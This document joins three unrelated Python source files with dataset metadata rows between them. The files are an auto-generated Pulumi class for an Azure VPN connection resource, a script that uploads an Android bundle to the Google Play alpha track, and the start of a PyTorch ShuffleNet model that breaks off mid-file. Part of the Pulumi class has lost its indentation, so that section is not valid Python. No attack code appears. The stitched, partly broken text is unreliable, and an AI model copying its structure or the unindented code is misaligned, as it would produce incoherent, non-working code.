        :param pulumi.Input[str] connection_name: The name of the connection.
        :param pulumi.Input[int] dpd_timeout_seconds: The dead peer detection timeout for a vpn connection in seconds.
        :param pulumi.Input[bool] enable_bgp: EnableBgp flag.
        :param pulumi.Input[bool] enable_internet_security: Enable internet security.
        :param pulumi.Input[bool] enable_rate_limiting: EnableBgp flag.
        :param pulumi.Input[str] id: Resource ID.
        :param pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]] ipsec_policies: The IPSec Policies to be considered by this connection.
        :param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
        :param pulumi.Input['SubResourceArgs'] remote_vpn_site: Id of the connected vpn site.
        :param pulumi.Input[int] routing_weight: Routing weight for vpn connection.
        :param pulumi.Input[str] shared_key: SharedKey for the vpn connection.
        :param pulumi.Input[bool] use_local_azure_ip_address: Use local azure ip to initiate connection.
        :param pulumi.Input[bool] use_policy_based_traffic_selectors: Enable policy-based traffic selectors.
        :param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']] vpn_connection_protocol_type: Connection protocol used for this connection.
        :param pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]] vpn_link_connections: List of all vpn site link connections to the gateway.
        """
        # Required properties are always stored.
        pulumi.set(__self__, "gateway_name", gateway_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        # Optional properties are stored only when explicitly provided, so the
        # provider can distinguish "unset" from an explicit None/default.
        if connection_bandwidth is not None:
            pulumi.set(__self__, "connection_bandwidth", connection_bandwidth)
        if connection_name is not None:
            pulumi.set(__self__, "connection_name", connection_name)
        if dpd_timeout_seconds is not None:
            pulumi.set(__self__, "dpd_timeout_seconds", dpd_timeout_seconds)
        if enable_bgp is not None:
            pulumi.set(__self__, "enable_bgp", enable_bgp)
        if enable_internet_security is not None:
            pulumi.set(__self__, "enable_internet_security", enable_internet_security)
        if enable_rate_limiting is not None:
            pulumi.set(__self__, "enable_rate_limiting", enable_rate_limiting)
        if id is not None:
            pulumi.set(__self__, "id", id)
        if ipsec_policies is not None:
            pulumi.set(__self__, "ipsec_policies", ipsec_policies)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if remote_vpn_site is not None:
            pulumi.set(__self__, "remote_vpn_site", remote_vpn_site)
        if routing_weight is not None:
            pulumi.set(__self__, "routing_weight", routing_weight)
        if shared_key is not None:
            pulumi.set(__self__, "shared_key", shared_key)
        if use_local_azure_ip_address is not None:
            pulumi.set(__self__, "use_local_azure_ip_address", use_local_azure_ip_address)
        if use_policy_based_traffic_selectors is not None:
            pulumi.set(__self__, "use_policy_based_traffic_selectors", use_policy_based_traffic_selectors)
        if vpn_connection_protocol_type is not None:
            pulumi.set(__self__, "vpn_connection_protocol_type", vpn_connection_protocol_type)
        if vpn_link_connections is not None:
            pulumi.set(__self__, "vpn_link_connections", vpn_link_connections)

    # Each property below is a thin pulumi.get/pulumi.set pair; the
    # getter name= argument gives the camelCase key used by the provider.
    @property
    @pulumi.getter(name="gatewayName")
    def gateway_name(self) -> pulumi.Input[str]:
        """
        The name of the gateway.
        """
        return pulumi.get(self, "gateway_name")

    @gateway_name.setter
    def gateway_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "gateway_name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The resource group name of the VpnGateway.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="connectionBandwidth")
    def connection_bandwidth(self) -> Optional[pulumi.Input[int]]:
        """
        Expected bandwidth in MBPS.
        """
        return pulumi.get(self, "connection_bandwidth")

    @connection_bandwidth.setter
    def connection_bandwidth(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "connection_bandwidth", value)

    @property
    @pulumi.getter(name="connectionName")
    def connection_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the connection.
        """
        return pulumi.get(self, "connection_name")

    @connection_name.setter
    def connection_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_name", value)

    @property
    @pulumi.getter(name="dpdTimeoutSeconds")
    def dpd_timeout_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        The dead peer detection timeout for a vpn connection in seconds.
        """
        return pulumi.get(self, "dpd_timeout_seconds")

    @dpd_timeout_seconds.setter
    def dpd_timeout_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "dpd_timeout_seconds", value)

    @property
    @pulumi.getter(name="enableBgp")
    def enable_bgp(self) -> Optional[pulumi.Input[bool]]:
        """
        EnableBgp flag.
        """
        return pulumi.get(self, "enable_bgp")

    @enable_bgp.setter
    def enable_bgp(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_bgp", value)

    @property
    @pulumi.getter(name="enableInternetSecurity")
    def enable_internet_security(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable internet security.
        """
        return pulumi.get(self, "enable_internet_security")

    @enable_internet_security.setter
    def enable_internet_security(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_internet_security", value)

    @property
    @pulumi.getter(name="enableRateLimiting")
    def enable_rate_limiting(self) -> Optional[pulumi.Input[bool]]:
        """
        EnableBgp flag.
        """
        return pulumi.get(self, "enable_rate_limiting")

    @enable_rate_limiting.setter
    def enable_rate_limiting(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_rate_limiting", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        Resource ID.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter(name="ipsecPolicies")
    def ipsec_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]]]:
        """
        The IPSec Policies to be considered by this connection.
        """
        return pulumi.get(self, "ipsec_policies")

    @ipsec_policies.setter
    def ipsec_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]]]):
        pulumi.set(self, "ipsec_policies", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource that is unique within a resource group. This name can be used to access the resource.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="remoteVpnSite")
    def remote_vpn_site(self) -> Optional[pulumi.Input['SubResourceArgs']]:
        """
        Id of the connected vpn site.
        """
        return pulumi.get(self, "remote_vpn_site")

    @remote_vpn_site.setter
    def remote_vpn_site(self, value: Optional[pulumi.Input['SubResourceArgs']]):
        pulumi.set(self, "remote_vpn_site", value)

    @property
    @pulumi.getter(name="routingWeight")
    def routing_weight(self) -> Optional[pulumi.Input[int]]:
        """
        Routing weight for vpn connection.
        """
        return pulumi.get(self, "routing_weight")

    @routing_weight.setter
    def routing_weight(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "routing_weight", value)

    @property
    @pulumi.getter(name="sharedKey")
    def shared_key(self) -> Optional[pulumi.Input[str]]:
        """
        SharedKey for the vpn connection.
        """
        return pulumi.get(self, "shared_key")

    @shared_key.setter
    def shared_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "shared_key", value)

    @property
    @pulumi.getter(name="useLocalAzureIpAddress")
    def use_local_azure_ip_address(self) -> Optional[pulumi.Input[bool]]:
        """
        Use local azure ip to initiate connection.
        """
        return pulumi.get(self, "use_local_azure_ip_address")

    @use_local_azure_ip_address.setter
    def use_local_azure_ip_address(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_local_azure_ip_address", value)

    @property
    @pulumi.getter(name="usePolicyBasedTrafficSelectors")
    def use_policy_based_traffic_selectors(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable policy-based traffic selectors.
        """
        return pulumi.get(self, "use_policy_based_traffic_selectors")

    @use_policy_based_traffic_selectors.setter
    def use_policy_based_traffic_selectors(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_policy_based_traffic_selectors", value)

    @property
    @pulumi.getter(name="vpnConnectionProtocolType")
    def vpn_connection_protocol_type(self) -> Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]]:
        """
        Connection protocol used for this connection.
        """
        return pulumi.get(self, "vpn_connection_protocol_type")

    @vpn_connection_protocol_type.setter
    def vpn_connection_protocol_type(self, value: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]]):
        pulumi.set(self, "vpn_connection_protocol_type", value)

    @property
    @pulumi.getter(name="vpnLinkConnections")
    def vpn_link_connections(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]]]:
        """
        List of all vpn site link connections to the gateway.
        """
        return pulumi.get(self, "vpn_link_connections")

    @vpn_link_connections.setter
    def vpn_link_connections(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]]]):
        pulumi.set(self, "vpn_link_connections", value)
class VpnConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_bandwidth: Optional[pulumi.Input[int]] = None,
connection_name: Optional[pulumi.Input[str]] = None,
dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_internet_security: Optional[pulumi.Input[bool]] = None,
enable_rate_limiting: Optional[pulumi.Input[bool]] = None,
gateway_name: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
remote_vpn_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
routing_weight: Optional[pulumi.Input[int]] = None,
shared_key: Optional[pulumi.Input[str]] = None,
use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
vpn_connection_protocol_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
vpn_link_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnSiteLinkConnectionArgs']]]]] = None,
__props__=None):
"""
VpnConnection Resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] connection_bandwidth: Expected bandwidth in MBPS.
:param pulumi.Input[str] connection_name: The name of the connection.
:param pulumi.Input[int] dpd_timeout_seconds: The dead peer detection timeout for a vpn connection in seconds.
:param pulumi.Input[bool] enable_bgp: EnableBgp flag.
:param pulumi.Input[bool] enable_internet_security: Enable internet security.
:param pulumi.Input[bool] enable_rate_limiting: EnableBgp flag.
:param pulumi.Input[str] gateway_name: The name of the gateway.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]] ipsec_policies: The IPSec Policies to be considered by this connection.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] remote_vpn_site: Id of the connected vpn site.
:param pulumi.Input[str] resource_group_name: The resource group name of the VpnGateway.
:param pulumi.Input[int] routing_weight: Routing weight for vpn connection.
:param pulumi.Input[str] shared_key: SharedKey for the vpn connection.
:param pulumi.Input[bool] use_local_azure_ip_address: Use local azure ip to initiate connection.
:param pulumi.Input[bool] use_policy_based_traffic_selectors: Enable policy-based traffic selectors.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']] vpn_connection_protocol_type: Connection protocol used for this connection.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnSiteLinkConnectionArgs']]]] vpn_link_connections: List of all vpn site link connections to the gateway.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VpnConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
VpnConnection Resource.
:param str resource_name: The name of the resource.
:param VpnConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VpnConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_bandwidth: Optional[pulumi.Input[int]] = None,
connection_name: Optional[pulumi.Input[str]] = None,
dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_internet_security: Optional[pulumi.Input[bool]] = None,
enable_rate_limiting: Optional[pulumi.Input[bool]] = None,
gateway_name: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
remote_vpn_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
routing_weight: Optional[pulumi.Input[int]] = None,
shared_key: Optional[pulumi.Input[str]] = None,
use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
vpn_connection_protocol_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
vpn_link_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnSiteLinkConnectionArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VpnConnectionArgs.__new__(VpnConnectionArgs)
__props__.__dict__["connection_bandwidth"] = connection_bandwidth
__props__.__dict__["connection_name"] = connection_name
__props__.__dict__["dpd_timeout_seconds"] = dpd_timeout_seconds
__props__.__dict__["enable_bgp"] = enable_bgp
__props__.__dict__["enable_internet_security"] = enable_internet_security
__props__.__dict__["enable_rate_limiting"] = enable_rate_limiting
if gateway_name is None and not opts.urn:
raise TypeError("Missing required property 'gateway_name'")
__props__.__dict__["gateway_name"] = gateway_name
__props__.__dict__["id"] = id
__props__.__dict__["ipsec_policies"] = ipsec_policies
__props__.__dict__["name"] = name
__props__.__dict__["remote_vpn_site"] = remote_vpn_site
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["routing_weight"] = routing_weight
__props__.__dict__["shared_key"] = shared_key
__props__.__dict__["use_local_azure_ip_address"] = use_local_azure_ip_address
__props__.__dict__["use_policy_based_traffic_selectors"] = use_policy_based_traffic_selectors
__props__.__dict__["vpn_connection_protocol_type"] = vpn_connection_protocol_type
__props__.__dict__["vpn_link_connections"] = vpn_link_connections
__props__.__dict__["connection_status"] = None
__props__.__dict__["egress_bytes_transferred"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["ingress_bytes_transferred"] = None
__props__.__dict__["provisioning_state"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200301:VpnConnection"), pulumi.Alias(type_="azure-native:network:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180401:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180401:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180601:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180601:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180701:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180701:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180801:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180801:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20181001:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181001:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20181101:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181101:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20181201:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181201:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190201:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190201:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190401:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190401:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190601:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190601:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190701:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190701:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190801:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190801:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190901:VpnConnection"), 
pulumi.Alias(type_="azure-nextgen:network/v20190901:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20191101:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20191201:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200401:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200501:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200501:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200601:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200701:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200801:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20201101:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20201101:VpnConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VpnConnection, __self__).__init__(
'azure-native:network/v20200301:VpnConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VpnConnection':
"""
Get an existing VpnConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VpnConnectionArgs.__new__(VpnConnectionArgs)
__props__.__dict__["connection_bandwidth"] = None
__props__.__dict__["connection_status"] = None
__props__.__dict__["dpd_timeout_seconds"] = None
__props__.__dict__["egress_bytes_transferred"] = None
__props__.__dict__["enable_bgp"] = None
__props__.__dict__["enable_internet_security"] = None
__props__.__dict__["enable_rate_limiting"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["ingress_bytes_transferred"] = None
__props__.__dict__["ipsec_policies"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["remote_vpn_site"] = None
__props__.__dict__["routing_weight"] = None
__props__.__dict__["shared_key"] = None
__props__.__dict__["use_local_azure_ip_address"] = None
__props__.__dict__["use_policy_based_traffic_selectors"] = None
__props__.__dict__["vpn_connection_protocol_type"] = None
__props__.__dict__["vpn_link_connections"] = None
return VpnConnection(resource_name, opts=opts, __props__=__props__)
    # --- Read-only output properties (values populated from the provider's response) ---
    @property
    @pulumi.getter(name="connectionBandwidth")
    def connection_bandwidth(self) -> pulumi.Output[Optional[int]]:
        """
        Expected bandwidth in MBPS.
        """
        return pulumi.get(self, "connection_bandwidth")
    @property
    @pulumi.getter(name="connectionStatus")
    def connection_status(self) -> pulumi.Output[str]:
        """
        The connection status.
        """
        return pulumi.get(self, "connection_status")
    @property
    @pulumi.getter(name="dpdTimeoutSeconds")
    def dpd_timeout_seconds(self) -> pulumi.Output[Optional[int]]:
        """
        The dead peer detection timeout for a vpn connection in seconds.
        """
        return pulumi.get(self, "dpd_timeout_seconds")
    @property
    @pulumi.getter(name="egressBytesTransferred")
    def egress_bytes_transferred(self) -> pulumi.Output[float]:
        """
        Egress bytes transferred.
        """
        return pulumi.get(self, "egress_bytes_transferred")
    @property
    @pulumi.getter(name="enableBgp")
    def enable_bgp(self) -> pulumi.Output[Optional[bool]]:
        """
        EnableBgp flag.
        """
        return pulumi.get(self, "enable_bgp")
    @property
    @pulumi.getter(name="enableInternetSecurity")
    def enable_internet_security(self) -> pulumi.Output[Optional[bool]]:
        """
        Enable internet security.
        """
        return pulumi.get(self, "enable_internet_security")
    # NOTE(review): the docstring below says "EnableBgp flag." for a rate-limiting
    # property — looks like a generator/spec copy-paste artifact; confirm upstream.
    @property
    @pulumi.getter(name="enableRateLimiting")
    def enable_rate_limiting(self) -> pulumi.Output[Optional[bool]]:
        """
        EnableBgp flag.
        """
        return pulumi.get(self, "enable_rate_limiting")
    @property
    @pulumi.getter
    def etag(self) -> pulumi.Output[str]:
        """
        A unique read-only string that changes whenever the resource is updated.
        """
        return pulumi.get(self, "etag")
    @property
    @pulumi.getter(name="ingressBytesTransferred")
    def ingress_bytes_transferred(self) -> pulumi.Output[float]:
        """
        Ingress bytes transferred.
        """
        return pulumi.get(self, "ingress_bytes_transferred")
    @property
    @pulumi.getter(name="ipsecPolicies")
    def ipsec_policies(self) -> pulumi.Output[Optional[Sequence['outputs.IpsecPolicyResponse']]]:
        """
        The IPSec Policies to be considered by this connection.
        """
        return pulumi.get(self, "ipsec_policies")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[Optional[str]]:
        """
        The name of the resource that is unique within a resource group. This name can be used to access the resource.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> pulumi.Output[str]:
        """
        The provisioning state of the VPN connection resource.
        """
        return pulumi.get(self, "provisioning_state")
    @property
    @pulumi.getter(name="remoteVpnSite")
    def remote_vpn_site(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
        """
        Id of the connected vpn site.
        """
        return pulumi.get(self, "remote_vpn_site")
    @property
    @pulumi.getter(name="routingWeight")
    def routing_weight(self) -> pulumi.Output[Optional[int]]:
        """
        Routing weight for vpn connection.
        """
        return pulumi.get(self, "routing_weight")
    @property
    @pulumi.getter(name="sharedKey")
    def shared_key(self) -> pulumi.Output[Optional[str]]:
        """
        SharedKey for the vpn connection.
        """
        return pulumi.get(self, "shared_key")
    @property
    @pulumi.getter(name="useLocalAzureIpAddress")
    def use_local_azure_ip_address(self) -> pulumi.Output[Optional[bool]]:
        """
        Use local azure ip to initiate connection.
        """
        return pulumi.get(self, "use_local_azure_ip_address")
    @property
    @pulumi.getter(name="usePolicyBasedTrafficSelectors")
    def use_policy_based_traffic_selectors(self) -> pulumi.Output[Optional[bool]]:
        """
        Enable policy-based traffic selectors.
        """
        return pulumi.get(self, "use_policy_based_traffic_selectors")
    @property
    @pulumi.getter(name="vpnConnectionProtocolType")
    def vpn_connection_protocol_type(self) -> pulumi.Output[Optional[str]]:
        """
        Connection protocol used for this connection.
        """
        return pulumi.get(self, "vpn_connection_protocol_type")
    @property
    @pulumi.getter(name="vpnLinkConnections")
    def vpn_link_connections(self) -> pulumi.Output[Optional[Sequence['outputs.VpnSiteLinkConnectionResponse']]]:
        """
        List of all vpn site link connections to the gateway.
        """
        return pulumi.get(self, "vpn_link_connections")
| 50.474843
| 3,116
| 0.683384
|
acff6f08ceb3e3d905f50309e9b580fe14e83f6c
| 3,459
|
py
|
Python
|
upload_bundle_to_alpha.py
|
21Buttons/docker-google-play-publisher
|
69b597789b8bbe33cdcb9e56ad5faea1d6422623
|
[
"Apache-2.0"
] | 1
|
2019-02-13T13:55:23.000Z
|
2019-02-13T13:55:23.000Z
|
upload_bundle_to_alpha.py
|
21Buttons/docker-google-play-publisher
|
69b597789b8bbe33cdcb9e56ad5faea1d6422623
|
[
"Apache-2.0"
] | null | null | null |
upload_bundle_to_alpha.py
|
21Buttons/docker-google-play-publisher
|
69b597789b8bbe33cdcb9e56ad5faea1d6422623
|
[
"Apache-2.0"
] | 2
|
2019-02-13T13:55:15.000Z
|
2021-01-05T10:35:29.000Z
|
#!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Uploads an aab to the alpha track."""
import os
from apiclient.discovery import build
import httplib2
from oauth2client import client
from oauth2client.service_account import ServiceAccountCredentials
# Release track to publish the bundle to.
TRACK = 'alpha'  # Can be 'alpha', 'beta', 'production' or 'rollout'
# Required configuration from the environment; a KeyError here means the
# container/runtime was not configured with these variables.
PACKAGE_NAME = os.environ['PACKAGE_NAME']
SERVICE_ACCOUNT_EMAIL = os.environ['SERVICE_ACCOUNT_EMAIL']
def main():
    """Upload /bundle.aab (and its ProGuard mapping) to the Play Store TRACK for PACKAGE_NAME."""
    # Create an httplib2.Http object to handle our HTTP requests and authorize it
    # with the Credentials. Note that the first parameter, service_account_name,
    # is the Email address created for the Service account. It must be the email
    # address associated with the key that was created.
    credentials = ServiceAccountCredentials.from_p12_keyfile(
        SERVICE_ACCOUNT_EMAIL,
        'key.p12',
        scopes=['https://www.googleapis.com/auth/androidpublisher'])
    http = httplib2.Http()
    http = credentials.authorize(http)
    service = build('androidpublisher', 'v3', http=http)
    # Process flags and read their values.
    package_name = PACKAGE_NAME
    # NOTE(review): paths assume the artifacts are mounted at the container
    # root — confirm against the Docker image layout.
    bundle_file = '/bundle.aab'
    mapping_file = '/mapping.txt'
    try:
        # All changes happen inside an "edit" transaction that is committed at the end.
        edit_request = service.edits().insert(body={}, packageName=package_name)
        result = edit_request.execute()
        edit_id = result['id']
        bundle_response = service.edits().bundles().upload(
            editId=edit_id,
            packageName=package_name,
            media_body=bundle_file,
            media_mime_type='application/octet-stream').execute()
        version_code = bundle_response['versionCode']
        print('Version code %d has been uploaded' % version_code)
        # Attach the ProGuard mapping so the Play Console can de-obfuscate crash traces.
        service.edits().deobfuscationfiles().upload(
            packageName=package_name,
            editId=edit_id,
            apkVersionCode=version_code,
            deobfuscationFileType='proguard',
            media_body=mapping_file,
            media_mime_type='application/octet-stream').execute()
        print('Mapping for version code %d has been uploaded' % version_code)
        # Assign the uploaded version to the configured track as a completed release.
        track_response = service.edits().tracks().update(
            editId=edit_id,
            track=TRACK,
            packageName=package_name,
            body={'releases': [{
                'versionCodes': [version_code],
                'status': 'completed',
            }]}).execute()
        print('Track %s is set with releases: %s' % (
            track_response['track'], str(track_response['releases'])))
        # Nothing takes effect until the edit transaction is committed.
        commit_request = service.edits().commit(editId=edit_id, packageName=package_name).execute()
        print('Edit "%s" has been committed' % (commit_request['id']))
    except client.AccessTokenRefreshError:
        print('The credentials have been revoked or expired, please re-run the '
              'application to re-authorize')
if __name__ == '__main__':
    main()
| 35.659794
| 99
| 0.677653
|
acff6f78266c55bb93f5b12a6306a5647ebb0769
| 3,542
|
py
|
Python
|
models/shufflenet.py
|
joaocneves/dropout_ensemble
|
3b8052fdc362efc9ef220933e7d454439a18540f
|
[
"MIT"
] | 4,983
|
2017-01-29T16:42:35.000Z
|
2022-03-31T20:36:07.000Z
|
models/shufflenet.py
|
joaocneves/dropout_ensemble
|
3b8052fdc362efc9ef220933e7d454439a18540f
|
[
"MIT"
] | 132
|
2017-03-11T09:52:39.000Z
|
2022-03-24T05:15:17.000Z
|
models/shufflenet.py
|
joaocneves/dropout_ensemble
|
3b8052fdc362efc9ef220933e7d454439a18540f
|
[
"MIT"
] | 2,168
|
2017-03-20T06:21:48.000Z
|
2022-03-31T15:01:39.000Z
|
'''ShuffleNet in PyTorch.
See the paper "ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
class ShuffleBlock(nn.Module):
    """Channel-shuffle layer for grouped convolutions.

    Reorders channels so information can cross group boundaries:
    [N,C,H,W] -> [N,g,C/g,H,W] -> swap the two group axes -> [N,C,H,W].
    """
    def __init__(self, groups):
        super(ShuffleBlock, self).__init__()
        self.groups = groups
    def forward(self, x):
        batch, channels, height, width = x.size()
        per_group = channels // self.groups
        # transpose(1, 2) on the (groups, per_group) axes is exactly permute(0,2,1,3,4)
        shuffled = x.view(batch, self.groups, per_group, height, width).transpose(1, 2)
        return shuffled.reshape(batch, channels, height, width)
class Bottleneck(nn.Module):
